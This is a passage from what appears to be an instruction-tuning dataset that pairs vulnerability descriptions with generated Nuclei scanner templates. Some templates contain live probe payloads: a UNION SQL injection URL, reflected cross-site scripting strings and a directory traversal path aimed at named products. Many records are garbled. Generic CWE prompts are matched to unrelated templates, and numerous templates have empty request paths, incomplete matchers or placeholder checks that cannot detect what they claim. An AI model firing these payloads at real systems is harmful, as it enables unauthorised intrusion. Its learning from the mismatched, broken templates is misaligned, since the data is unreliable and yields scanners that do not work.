- method: POST\n path:\n - \"{{BaseURL}}/action.php\" \n matchers:\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: word\n words:\n - \"Warning: mysqli_num_rows() expects parameter 1 to be\" \n - \"xdebug-error xe-warning\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2021-41648"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: mastodon-mastodon\n\ninfo:\n name: Mastodon-mastodon User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Mastodon-mastodon user name information check was conducted.\n tags: osint,osint-social,mastodon-mastodon,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://mastodon.social/@{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"profile:username\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: AIC Intelligent Campus System - Password Exposure", "input": "Title: AIC Intelligent Campus System - Password Exposure\nSummary: AIC Intelligent Campus System - Password Exposure. Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.
    \n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: aic-intelligent-password-exposure\n\ninfo:\n name: AIC Intelligent Campus System - Password Exposure\n author: SleepingBag945\n severity: medium\n description: Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.
    \n tags: aic,exposure,password,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/datacenter/dataOrigin.ashx?c=login\" \n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "medium", "id": "aic-intelligent-password-exposure"} {"instruction": "Generate a Nuclei template for: New Relic API Service Key", "input": "Title: New Relic API Service Key\nSummary: New Relic API Service Key. Tags: newrelic, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: newrelic-api-service-key\n\ninfo:\n name: New Relic API Service Key\n author: DhiyaneshDK\n severity: info\n description: New Relic API Service Key\n tags: newrelic,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "newrelic-api-service-key"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: teamcity-guest-login-enabled\n\ninfo:\n name: JetBrains TeamCity - Guest User Access Enabled\n author: Ph33r\n severity: high\n description: TeamCity provides the ability to turn on the guest login allowing anonymous access to the TeamCity UI.\n tags: misconfig,teamcity,jetbrains,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Location: /overview.html\" \n - \"TCSESSIONID=\" \n part: header\n condition: and\n - type: status\n status:\n - 302", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Sitefinity Login", "input": "Title: Sitefinity Login\nSummary: Sitefinity Login. This template identifies the Sitefinity login page.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sitefinity-login\n\ninfo:\n name: Sitefinity Login\n author: dhiyaneshDK\n severity: info\n description: This template identifies the Sitefinity login page.\n tags: sitefinity,edb,panel,progress,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Sitefinity/Authenticate/SWT\" \n matchers:\n - type: word\n words:\n - \"Telerik.Sitefinity.Web.UI.UserPreferences\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sitefinity-login"} {"instruction": "Generate a Nuclei template for: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal", "input": "Title: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal\nSummary: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal. There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: yonyou-fe-directory-traversal\n\ninfo:\n name: FE collaborative Office templateOfTaohong_manager.jsp - Path Traversal\n author: SleepingBag945\n severity: medium\n description: There is a directory traversal vulnerability in the templateOfTaohong_manager.jsp file of UFIDA FE collaborative office platform. Through the vulnerability, attackers can obtain directory files and other information, leading to further attacks.\n tags: yonyou,fe,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/mediafile/templateOfTaohong_manager.jsp?path=/../../../\" \n matchers:\n - type: word\n words:\n - \"window.location=\"templateOfTaohong_manager.jsp?path=\"\" \n - \"var next=window.confirm(\"\u786e\u5b9a\u5220\u9664\u6587\u4ef6\u5417\uff1f\");\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "yonyou-fe-directory-traversal"} {"instruction": "Generate a Nuclei template for CVE-2023-45855", "input": "Title: Path Traversal in qdpm qdpm\nSummary: qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: qdpm qdpm\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-45855\n\ninfo:\n name: qdPM 9.2 - Directory Traversal\n author: DhiyaneshDk\n severity: high\n description: qdPM 9.2 allows Directory Traversal to list files and directories by navigating to the /uploads URI.\n tags: cve,cve2023,qdpm,lfi,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/uploads/\" \n matchers:\n - type: word\n words:\n - \"Index of /uploads\" \n - \"attachments/\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2023-45855"} {"instruction": "Generate a Nuclei template for: expect - Privilege Escalation", "input": "Title: expect - Privilege Escalation\nSummary: expect - Privilege Escalation. expect is a Unix scripting and testing utility that automates interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, and more. It uses scripts to control interactive applications, making it useful for automating tasks that involve user input.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-expect\n\ninfo:\n name: expect - Privilege Escalation\n author: daffainfo\n severity: high\n description: expect is a Unix scripting and testing utility that automates interactive applications such as telnet, ftp, passwd, fsck, rlogin, tip, and more. It uses scripts to control interactive applications, making it useful for automating tasks that involve user input.\n tags: code,linux,expect,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-expect"} {"instruction": "Generate a Nuclei template for CVE-2024-32738", "input": "Title: SQL Injection in cyberpower powerpanel\nSummary: A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\u00a0An unauthenticated remote attacker can leak sensitive information via the \"query_ptask_lean\" function within MCUDBHelper.\n\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: cyberpower powerpanel\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-32738\n\ninfo:\n name: CyberPower - SQL Injection\n author: DhiyaneshDk\n severity: high\n description: A sql injection vulnerability exists in CyberPower PowerPanel Enterprise prior to v2.8.3.\n tags: cve,cve2024,cyberpower,sqli,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--\" \n matchers:\n - type: word\n words:\n - \":\"finished\"\" \n - \"\"success\":\" \n - \"modifiedtime\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-32738"} {"instruction": "Generate a Nuclei template for: Discover Cold Fusion cfcache.map Files", "input": "Title: Discover Cold Fusion cfcache.map Files\nSummary: Discover Cold Fusion cfcache.map Files. Adobe Cold Fusion cfcache.map file is exposed.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: cold-fusion-cfcache-map\n\ninfo:\n name: Discover Cold Fusion cfcache.map Files\n author: geeknik\n severity: low\n description: Adobe Cold Fusion cfcache.map file is exposed.\n tags: exposure,coldfusion,adobe,files,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/cfcache.map\" \n matchers:\n - type: word\n words:\n - \"Mapping=\" \n - \"SourceTimeStamp=\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "cold-fusion-cfcache-map"} {"instruction": "Generate a Nuclei template for CVE-2020-24391", "input": "Title: Unknown Vulnerability in mongo-express_project mongo-express\nSummary: mongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.\nVulnerability Type: Unknown Vulnerability\nSeverity: critical\nAffected Products: mongo-express_project mongo-express\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-24391\n\ninfo:\n name: Mongo-Express - Remote Code Execution\n author: leovalcante\n severity: critical\n description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server.\n tags: cve,cve2020,mongo,express,rce,intrusive,mongo-express_project,node.js,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: body_3\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2020-24391"} {"instruction": "Generate a Nuclei template for: Missing Nginx Rate Limiting Configuration", "input": "Title: Missing Nginx Rate Limiting Configuration\nSummary: Missing Nginx Rate Limiting Configuration. Ensures that rate limiting is properly configured in Nginx to prevent excessive requests from a single client.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: file-missing-nginx-rate-limiting\n\ninfo:\n name: Missing Nginx Rate Limiting Configuration\n author: pussycat0x\n severity: medium\n description: Ensures that rate limiting is properly configured in Nginx to prevent excessive requests from a single client.\n tags: audit,file,nginx,hardening\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "file-missing-nginx-rate-limiting"} {"instruction": "Generate a Nuclei template for: anydesk phishing Detection", "input": "Title: anydesk phishing Detection\nSummary: anydesk phishing Detection. An anydesk phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: anydesk-phish\n\ninfo:\n name: anydesk phishing Detection\n author: rxerium\n severity: info\n description: An anydesk phishing website was detected\n tags: phishing,anydesk,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"The Fast Remote Desktop Application \u2013 AnyDesk\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "anydesk-phish"} {"instruction": "Generate a Nuclei template for: Bash Scanner", "input": "Title: Bash Scanner\nSummary: Bash Scanner. Indicator for bash Dangerous Commands \u2013 You Should Never Execute on Linux\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: bash-scanner\n\ninfo:\n name: Bash Scanner\n author: ransomsec\n severity: info\n description: Indicator for bash Dangerous Commands \u2013 You Should Never Execute on Linux\n tags: bash,file,shell,sh\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "bash-scanner"} {"instruction": "Generate a Nuclei template for: SSH Host Keys < 2048 Bits Considered Weak", "input": "Title: SSH Host Keys < 2048 Bits Considered Weak\nSummary: SSH Host Keys < 2048 Bits Considered Weak. SSH host keys with a bit length below 2048 are deemed weak, posing an increased vulnerability to security threats. Employing robust key lengths is crucial for fortifying the integrity of encrypted communication and thwarting potential exploits.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: ssh-weak-public-key\n\ninfo:\n name: SSH Host Keys < 2048 Bits Considered Weak\n author: pussycat0x\n severity: low\n description: SSH host keys with a bit length below 2048 are deemed weak, posing an increased vulnerability to security threats. Employing robust key lengths is crucial for fortifying the integrity of encrypted communication and thwarting potential exploits.\n tags: enum,js,ssh,misconfig,network,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "ssh-weak-public-key"} {"instruction": "Generate a Nuclei template for: phpMyFAQ Installation - Exposure", "input": "Title: phpMyFAQ Installation - Exposure\nSummary: phpMyFAQ Installation - Exposure. phpMyFAQ installation is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: phpmyfaq-installer\n\ninfo:\n name: phpMyFAQ Installation - Exposure\n author: ritikchaddha\n severity: high\n description: phpMyFAQ installation is exposed.\n tags: misconfig,phpmyfaq,install,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/setup/index.php\" \n matchers:\n - type: word\n words:\n - \"phpMyFAQ\" \n - \"Setup\" \n part: body\n condition: and\n - type: word\n words:\n - \"phpmyfaq-setup\" \n part: header", "category": "generic", "severity": "high", "id": "phpmyfaq-installer"} {"instruction": "Generate a Nuclei template for CVE-2023-45249", "input": "Title: Vulnerability (CWE-1393) in acronis cyber_infrastructure\nSummary: Remote command execution due to use of default passwords. The following products are affected: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, Acronis Cyber Infrastructure (ACI) before build 5.1.1-71, Acronis Cyber Infrastructure (ACI) before build 5.2.1-69, Acronis Cyber Infrastructure (ACI) before build 5.3.1-53, Acronis Cyber Infrastructure (ACI) before build 5.4.4-132.\nVulnerability Type: Vulnerability (CWE-1393)\nSeverity: critical\nAffected Products: acronis cyber_infrastructure\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-45249\n\ninfo:\n name: Acronis Cyber Infrastructure - Default Password\n author: darses\n severity: critical\n description: Acronis Cyber Infrastructure (ACI) before build 5.0.1-61, 5.1.1-71, 5.2.1-69, 5.3.1-53, and 5.4.4-132 contain a remote command execution caused by use of default passwords, letting attackers execute arbitrary commands remotely, exploit requires access to the system with default credentials.\n tags: cve,cve2023,kev,acronis,network,js,postgresql,default-login,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2023-45249"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: brickset\n\ninfo:\n name: Brickset User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Brickset user name information check was conducted.\n tags: osint,osint-hobby,brickset,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://forum.brickset.com/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Activity\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2021-24407", "input": "Title: Cross-Site Scripting (XSS) in tielabs jannah\nSummary: The Jannah WordPress theme before 5.4.5 did not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action, leading to a Reflected Cross-site Scripting (XSS) vulnerability.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: tielabs jannah\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24407\n\ninfo:\n name: WordPress Jannah Theme <5.4.5 - Cross-Site Scripting\n author: pikpikcu\n severity: medium\n description: WordPress Jannah theme before 5.4.5 contains a reflected cross-site scripting vulnerability. It does not properly sanitize the 'query' POST parameter in its tie_ajax_search AJAX action.\n tags: cve2021,cve,wordpress,xss,wp-theme,wpscan,tielabs,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/themes/jannah/assets/\" \n - \"attachment-jannah-image-\" \n condition: or\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-24407"} {"instruction": "Generate a Nuclei template to detect Improper Resource Shutdown or Release", "input": "Title: Improper Resource Shutdown or Release (CWE-404)\nSummary: The product does not release or incorrectly releases a resource before it is made available for re-use. When a resource is created or allocated, the developer is responsible for properly releasing the resource as well as accounting for all potential paths of expiration or invalidation, such as a set period of time or revocation.\nVulnerability Type: Improper Resource Shutdown or Release\nSeverity: medium\nIndicators: invalid", "output": "id: azure-takeover-detection\n\ninfo:\n name: Microsoft Azure Takeover Detection\n author: pdteam\n severity: high\n description: Microsoft Azure is vulnerable to subdomain takeover attacks. Subdomain takeovers are a common, high-severity threat for organizations that regularly create and delete many resources. A subdomain takeover can occur when a D>\n tags: dns,takeover,azure,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-404"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: rstudio-detect\n\ninfo:\n name: RStudio Panel - Detect\n author: philippedelteil\n severity: info\n description: RStudio panel was detected.\n tags: panel,rstudio,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"RStudio\" \n part: header\n - type: status\n status:\n - 302", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2014-9606", "input": "Title: Cross-Site Scripting (XSS) in netsweeper netsweeper\nSummary: Multiple cross-site scripting (XSS) vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: netsweeper netsweeper\nIndicators: error, vulnerability detected", "output": "id: CVE-2014-9606\n\ninfo:\n name: Netsweeper 4.0.8 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) server parameter to remotereporter/load_logfiles.php, (2) customctid parameter to webadmin/policy/category_table_ajax.php, (3) urllist parameter to webadmin/alert/alert.php, (4) QUERY_STRING to webadmin/ajaxfilemanager/ajax_get_file_listing.php, or (5) PATH_INFO to webadmin/policy/policy_table_ajax.php/.\n tags: cve2014,cve,netsweeper,xss,packetstorm,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2014-9606"} {"instruction": "Generate a Nuclei template for: Persistent Disks Attached to Suspended Virtual Machines", "input": "Title: Persistent Disks Attached to Suspended Virtual Machines\nSummary: Persistent Disks Attached to Suspended Virtual Machines. Ensure that persistent disks are not attached to suspended virtual machine (VM) instances in your Google Cloud environment. Persistent disks attached to suspended VMs continue to incur charges even when the VM is not running, leading to unnecessary costs.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-persistent-disks-suspended-vms\n\ninfo:\n name: Persistent Disks Attached to Suspended Virtual Machines\n author: princechaddha\n severity: high\n description: Ensure that persistent disks are not attached to suspended virtual machine (VM) instances in your Google Cloud environment. Persistent disks attached to suspended VMs continue to incur charges even when the VM is not running, leading to unnecessary costs.\n tags: cloud,devops,gcp,gcloud,compute,storage,cost-optimization,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-persistent-disks-suspended-vms"} {"instruction": "Generate a Nuclei template for: Sofacy Group Winexe Tool Hash - Detect", "input": "Title: Sofacy Group Winexe Tool Hash - Detect\nSummary: Sofacy Group Winexe Tool Hash - Detect. Winexe tool used by Sofacy group in Bundestag APT.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sofacy-winexe-malware-hash\n\ninfo:\n name: Sofacy Group Winexe Tool Hash - Detect\n author: pussycat0x\n severity: info\n description: Winexe tool used by Sofacy group in Bundestag APT.\n tags: malware,sofacy\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sofacy-winexe-malware-hash"} {"instruction": "Generate a Nuclei template for CVE-2021-24934", "input": "Title: Cross-Site Scripting (XSS) in yellowpencil visual_css_style_editor\nSummary: The Visual CSS Style Editor WordPress plugin before 7.5.4 does not sanitise and escape the wyp_page_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: yellowpencil visual_css_style_editor\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-24934\n\ninfo:\n name: Visual CSS Style Editor < 7.5.4 - Cross-Site Scripting\n author: Splint3r7\n severity: medium\n description: The plugin does not sanitise and escape the wyp_page_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue\n tags: cve,cve2021,wordpress,wp,wp-plugin,yellowpencil,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2021-24934"} {"instruction": "Generate a Nuclei template for: Python App - SQL Exception", "input": "Title: Python App - SQL Exception\nSummary: Python App - SQL Exception. A generic SQL exception was discovered in Python according to PEP 249.\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: python-app-sql-exceptions\n\ninfo:\n name: Python App - SQL Exception\n author: geeknik\n severity: medium\n description: A generic SQL exception was discovered in Python according to PEP 249.\n tags: file,logs,python,sql\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "python-app-sql-exceptions"} {"instruction": "Generate a Nuclei template for: Speedtest Panel - Detection", "input": "Title: Speedtest Panel - Detection\nSummary: Speedtest Panel - Detection. Speedtest panel was discovered\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: speedtest-panel\n\ninfo:\n name: Speedtest Panel - Detection\n author: rxerium\n severity: info\n description: Speedtest panel was discovered\n tags: speedtest,tracker,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/login\" \n matchers:\n - type: word\n words:\n - \"Login - Speedtest Tracker\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "speedtest-panel"} {"instruction": "Generate a Nuclei template for CVE-2025-34032", "input": "Title: Vulnerability (CWE-20) in geoffrowland jmol\nSummary: A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: medium\nAffected Products: geoffrowland jmol\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-34032\n\ninfo:\n name: Moodle LMS Jmol Plugin <= 6.1 - Cross-Site Scripting\n author: madrobot,ritikchaddha\n severity: medium\n description: A reflected cross-site scripting (XSS) vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the data parameter in jsmol.php. The application fails to properly sanitize user input before embedding it into the HTTP response, allowing an attacker to execute arbitrary JavaScript in the victim's browser by crafting a malicious link. This can be used to hijack user sessions or manipulate page content.\n tags: cve,cve2025,moodle,xss,edb,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=saveFile&data=%3Cscript%3Ealert(document.domain)%3C/script%3E&mimetype=text/html\" \n matchers:\n - type: dsl\n condition: and\n - type: regex", "category": "cve", "severity": "medium", "id": "CVE-2025-34032"} {"instruction": "Generate a Nuclei template for: Clockwork Dashboard Exposure", "input": "Title: Clockwork Dashboard Exposure\nSummary: Clockwork Dashboard Exposure. Clockwork Dashboard is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: clockwork-dashboard-exposure\n\ninfo:\n name: Clockwork Dashboard Exposure\n author: dhiyaneshDk\n severity: high\n description: Clockwork Dashboard is exposed.\n tags: exposure,unauth,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/__clockwork/latest\" \n matchers:\n - type: word\n words:\n - \"\"id\":\" \n - \"\"version\":\" \n - \"\"method\":\" \n - \"\"url\":\" \n - \"\"time\":\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header", "category": "generic", "severity": "high", "id": "clockwork-dashboard-exposure"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: qihang-media-disclosure\n\ninfo:\n name: QiHang Media Web Digital Signage 3.0.9 - Cleartext Credentials Disclosure\n author: gy741\n severity: high\n description: QiHang Media Web Digital Signage 3.0.9 suffers from a clear-text credentials disclosure vulnerability that allows an unauthenticated attacker to issue a request to an unprotected directory that hosts an XML file /xml/User/User.xml and obtain administrative login information that allows for a successful authentication bypass attack.\n tags: qihang,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/xml/User/User.xml\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"account=\" \n - \"password=\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: MySQL Database Instances - SQL Auditing Disabled", "input": "Title: MySQL Database Instances - SQL Auditing Disabled\nSummary: MySQL Database Instances - SQL Auditing Disabled. SQL auditing is disabled on the MySQL database instances, meaning activities such as user queries and connection events are not logged. This may hinder the ability to track database activity, detect suspicious behavior, and comply with security auditing requirements.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: mysql-audit-disabled\n\ninfo:\n name: MySQL Database Instances - SQL Auditing Disabled\n author: DhiyaneshDK\n severity: high\n description: SQL auditing is disabled on the MySQL database instances, meaning activities such as user queries and connection events are not logged. This may hinder the ability to track database activity, detect suspicious behavior, and comply with security auditing requirements.\n tags: cloud,devops,aliyun,alibaba,alibaba-cloud-config,alibaba-rds\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "mysql-audit-disabled"} {"instruction": "Generate a Nuclei template for: MQTT Unauthenticated Broker - Detect", "input": "Title: MQTT Unauthenticated Broker - Detect\nSummary: MQTT Unauthenticated Broker - Detect. Detects an unauthenticated MQTT broker and attempts to subscribe to the $SYS/# topic to enumerate broker and system information.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: unauth-mqtt-broker\n\ninfo:\n name: MQTT Unauthenticated Broker - Detect\n author: matejsmycka\n severity: high\n description: Detects an unauthenticated MQTT broker and attempts to subscribe to the $SYS/# topic to enumerate broker and system information.\n tags: js,tcp,network,mqtt,unauth\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "unauth-mqtt-broker"} {"instruction": "Generate a Nuclei template for: Misconfigured Concrete5", "input": "Title: Misconfigured Concrete5\nSummary: Misconfigured Concrete5. Concrete5 